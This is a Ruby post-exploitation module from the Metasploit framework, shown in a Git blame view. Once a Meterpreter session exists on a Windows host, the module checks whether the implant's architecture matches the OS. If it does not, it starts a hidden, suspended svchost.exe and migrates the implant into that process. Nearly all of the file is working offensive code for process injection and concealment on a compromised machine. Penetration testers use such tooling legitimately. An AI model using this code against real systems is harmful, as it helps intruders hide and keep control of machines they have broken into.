metasploit-framework/modules/post/windows/manage/archmigrate.rb

111 lines
3.8 KiB
Ruby
Raw Normal View History

2017-07-13 22:53:59 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
2017-07-13 22:53:59 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::File
include Msf::Post::Common
2017-05-13 17:35:48 +00:00
include Msf::Post::Windows::Priv
def initialize(info = {})
super(update_info(
info,
'Name' => 'Architecture Migrate',
'Description' => %q(This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a
new process with the correct architecture and migrates into that process.),
'License' => MSF_LICENSE,
'Author' => ['Koen Riepe (koen.riepe@fox-it.com)'],
'References' => [''],
'Platform' => [ 'win' ],
'Arch' => [ 'x86', 'x64' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
2017-02-27 12:24:31 +00:00
register_options(
[
OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
2017-05-13 17:35:48 +00:00
OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),
2017-05-23 18:40:42 +00:00
OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have SYSTEM privileges', false])
],
self.class
)
end
def check_32_on_64
begin
apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
# railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
if apicall == "\x00\x00\x00\x00"
migrate = false
else
migrate = true
end
return migrate
rescue
print_error('Railgun not available, this module only works for binary meterpreters.')
end
end
def get_windows_loc
apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
windir = apicall.split(":")[0]
return windir
end
2017-05-13 17:35:48 +00:00
def do_migrate
if check_32_on_64
print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
newproc = datastore['EXE']
if exist?(newproc)
print_status("Starting new x64 process #{newproc}")
pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
print_good("Got pid #{pid}")
print_status('Migrating..')
session.core.migrate(pid)
if pid == session.sys.process.getpid
print_good('Success!')
else
print_error('Migration failed!')
end
else
print_error('The selected executable to migrate into does not exist')
if datastore['FALLBACK']
windir = get_windows_loc
newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"
if exist?(newproc)
print_status("Starting new x64 process #{newproc}")
pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
print_good("Got pid #{pid}")
print_status('Migrating..')
session.core.migrate(pid)
if pid == session.sys.process.getpid
print_good('Success!')
2017-02-27 12:24:31 +00:00
else
print_error('Migration failed!')
end
end
end
end
else
print_good('The meterpreter is the same architecture as the OS!')
end
end
2017-05-13 17:35:48 +00:00
def run
2017-05-23 19:13:55 +00:00
if datastore['IGNORE_SYSTEM']
do_migrate
elsif !datastore['IGNORE_SYSTEM'] && is_system?
print_error('You are running as SYSTEM! Aborting migration.')
elsif datastore['IGNORE_SYSTEM'] && is_system?
print_error('You are running as SYSTEM! You will lose your privileges!')
do_migrate
elsif !datastore['IGNORE_SYSTEM'] && !is_system?
print_status('You\'re not running as SYSTEM. Moving on...')
do_migrate
end
2017-05-13 17:35:48 +00:00
end
end